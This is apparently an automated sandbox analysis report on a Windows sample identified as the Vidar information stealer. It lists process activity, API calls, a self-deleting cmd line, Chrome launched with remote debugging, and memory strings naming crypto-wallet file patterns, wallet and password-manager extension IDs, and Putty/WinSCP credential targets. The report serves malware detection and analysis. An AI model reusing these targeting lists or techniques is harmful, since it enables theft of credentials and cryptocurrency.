          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1892,i,7460351053640162327,6554442286005526848,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2444 /prefetch:3
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\o89zu" & exit
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 11
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\o89zu" & exitJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1892,i,7460351053640162327,6554442286005526848,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2444 /prefetch:3Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 11Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: ngbtiladkrthgad.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: ngbtiladkrthgad.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: ngbtiladkrthgad.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: ngbtiladkrthgad.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: ngbtiladkrthgad.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_004108E0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004108E0
          Source: ngbtiladkrthgad.exeStatic PE information: section name: .00cfg
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_004108E0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004108E0
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeEvasive API call chain: GetSystemTime,DecisionNodes
          Source: C:\Windows\SysWOW64\timeout.exe TID: 7612Thread sleep count: 96 > 30Jump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00414E70 wsprintfA,FindFirstFileA,DeleteFileA,FindNextFileA,strlen,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,FindClose,0_2_00414E70
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00407210 ExpandEnvironmentStringsA,FindFirstFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,StrCmpCA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,CopyFileA,DeleteFileA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,0_2_00407210
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_0040B6B0 FindFirstFileA,FindNextFileA,strlen,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindClose,0_2_0040B6B0
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00415EB0 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindClose,0_2_00415EB0
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00408360 FindFirstFileA,CopyFileA,FindNextFileA,FindNextFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,FindClose,0_2_00408360
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00413FD0 wsprintfA,FindFirstFileA,FindNextFileA,strlen,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,0_2_00413FD0
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_004013F0 FindFirstFileA,FindClose,FindNextFileA,strlen,FindFirstFileA,DeleteFileA,FindNextFileA,CopyFileA,CopyFileA,DeleteFileA,FindClose,0_2_004013F0
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00413580 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,SymMatchString,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindClose,0_2_00413580
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_004097B0 FindFirstFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,0_2_004097B0
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_0040ACD0 wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strlen,lstrlenA,DeleteFileA,CopyFileA,FindClose,0_2_0040ACD0
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00408C90 lstrcpyA,lstrcatA,FindFirstFileA,FindNextFileA,strlen,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,FindFirstFileA,FindNextFileA,strlen,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,FindClose,FindClose,DeleteFileA,_invalid_parameter_noinfo_noreturn,0_2_00408C90
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00414950 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,strlen,FindClose,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414950
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00409560 ??2@YAPAXI@Z,??2@YAPAXI@Z,_invalid_parameter_noinfo_noreturn,FindFirstFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,0_2_00409560
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00413AF0 SymMatchString,SymMatchString,SymMatchString,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00413AF0
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_0040FDD0 GetSystemInfo,wsprintfA,0_2_0040FDD0
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW<=
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1823139867.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_004108E0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004108E0
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_0040F470 CloseHandle,lstrlenA,GetProcessHeap,RtlFreeHeap,GetProcessHeap,HeapAlloc,lstrcpyA,0_2_0040F470

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Searches for specific processes (likely to inject)
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00411250 CreateToolhelp32Snapshot,Process32First,StrCmpCA,Process32Next,StrCmpCA,CloseHandle,0_2_00411250
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00411310 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,0_2_00411310
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\o89zu" & exitJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 11Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,GetLocaleInfoA,LocalFree,0_2_0040FC20
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_0041BAA0 GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_0041BAA0
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00417210 EntryPoint,lstrlenW,GetWindowsDirectoryW,GetComputerNameW,GetFullPathNameA,GetUserNameW,GetFileType,GetModuleFileNameA,GetTempPathW,0_2_00417210
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_0040FBC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_0040FBC0
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected Vidar stealer
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Yara matchFile source: Process Memory Space: ngbtiladkrthgad.exe PID: 7304, type: MEMORYSTR
          Found many strings related to Crypto-Wallets (likely being stolen)
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1824047541.00000000031D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: info.seco
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: passphrase.json
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
          Source: ngbtiladkrthgad.exe, 00000000.00000003.1321478371.0000000000665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: lgcnhelpchnceeipipijaljkblbcobl|1|1|1|Tronium|1|pnndplcbkakcplkjnolgbkdgjikjednm|1|0|0|Trust Wallet|1|egjidjbpglichdcondbcbdnbeeppgdph|1|0|0|Exodus Web3 Wallet|1|aholpfdialjgjfhomihkjbmgjidlcdno|1|0|0|Braavos|1|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|1|kkpllkodjeloidieedojogacfhpaihoh|1|0|0|OKX Web3 Wallet|1|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender|1|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|1|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|GeroWallet|1|bgpipimickeadkjlklgciifhnalhdjhe|1|0|0|Pontem Wallet|1|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Finnie|1|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra|1|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Microsoft AutoFill|0|fiedbfgcleddlbcmgdigjgdfcggjcion|1|0|0|Bitwarden|0|nngceckbapebfimnlniiiahkandclblb|1|0|0|KeePass Tusk|0|fmhmiaejopepamlcjkncpgpdjichnecm|1|0|0|KeePassXC-Browser|0|oboonakemofpalcgghocfoadofidjkkk|1|0|0|Rise - Aptos Wallet|1|hbbgbephgojikajhfbomhlmmollphcad|1|0|0|Rainbow Wallet|1|opfgelmcmbiajamepnmloijbpoleiama|1|0|0|Nightly|1|fiikommddbeccaoicoejoniammnalkfa|1|0|0|Ecto Wallet|1|bgjogpoidejdemgoochpnkmdjpocgkha|1|0|0|Coinhub|1|jgaaimajipbpdogpdglhaphldakikgef|1|0|0|Leap Cosmos Wallet|1|fcfcfllfndlomdhbehjjcoimbgofdncg|1|0|0|MultiversX DeFi Wallet|1|dngmlblcodfobpdpecaadgfbcggfjfnm|1|0|0|Frontier Wallet|1|kppfdiipphfccemcignhifpjkapfbihd|1|0|0|SafePal|1|lgmpcpglpngdoalbgeoldeajfclnhafa|1|0|0|SubWallet - Polkadot Wallet|1|onhogfjeacnfoofkfgppdlbmlmnplgbn|1|0|0|Fluvi Wallet|1|mmmjbcfofconkannjonfmjjajpllddbg|1|0|0|Glass Wallet - Sui Wallet|1|loinekcabhlmhjjbocijdoimmejangoa|1|0|0|Morphis Wallet|1|heefohaffomkkkphnlpohglngmbcclhi|1|0|0|Xverse Wallet|1|idnnbdplmphpflfnlkomgpfbpcgelopg|1|0|0|Compass Wallet for Sei|1|anokgmphncpekkhclmingpimjmcooifb|1|0|0|HAVAH Wallet|1|cnncmdhjacpkmjmkcafchppbnpnhdmon|1|0|0|Elli - Sui Wallet|1|ocjdpmoallmgmjbbogfiiaofphbjgchh|1|0|0|Venom Wallet|1|ojggmchlghnjlapmfbnjholfjkiidbch|1|0|0|Pulse Wallet Chromium|1|ciojocpkclfflombbcfigcijjcbkmhaf|1|0|0|Magic Eden Wallet|1|mkpegjkblkkefacfnmkajcjmabijhclg|1|0|0|Backpack Wallet|1|aflkmfhebedbjioipglgcbcmnbpgliof|1|0|0|Tonkeeper Wallet|1|omaabbefbmiijedngplfjmnooppbclkk|1|0|0|OpenMask Wallet|1|penjlddjkjgpnkllboccdgccekpkcbin|1|0|0|SafePal Wallet|1|apenkfbbpmhihehmihndmmcdanacolnh|1|0|0|Bitget Wallet|1|jiidiaalihmmhddjgbnbgdfflelocpak|1|0|0|TON Wallet|1|nphplpgoakhhjchkkhmiggakijnkhfnd|1|0|0|MyTonWallet|1|fldfpgipfncgnd
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1824047541.00000000031D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: MultiDoge
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: seed.seco
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
          Tries to harvest and steal Bitcoin Wallet information
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
